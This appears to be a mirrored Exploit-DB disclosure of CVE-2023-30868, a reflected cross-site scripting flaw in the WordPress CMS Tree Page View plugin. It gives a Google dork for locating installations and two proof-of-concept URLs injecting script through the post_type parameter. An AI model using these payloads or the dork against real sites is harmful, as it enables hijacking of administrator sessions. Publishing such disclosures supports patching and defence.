Tree Page View Plugin 1.6.7 – Cross Site Scripting (XSS)

• Exploit Database
• 18 阅读

• 作者： LEE SE HYOUNG
  日期： 2023-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51507/

• # Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
  # Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
  # Date: 2023-04-24
  # Exploit Author: LEE SE HYOUNG (hackintoanetwork)
  # Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
  # Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
  # Category: Web Application
  # Version: 1.6.7
  # Tested on: Debian / WordPress 6.1.1
  # CVE : CVE-2023-30868
  # Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
  
  # 1. Technical Description:
  The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
  This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
  
  
  # 2. Proof of Concept (PoC):
  
  WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
  In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
  
  1. CMS Tree Page View Plugin <= 1.6.6
  
  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
  
  b.your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
  
  2. CMS Tree Page View Plugin <= 1.6.7
  
  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
  
  b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
  
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.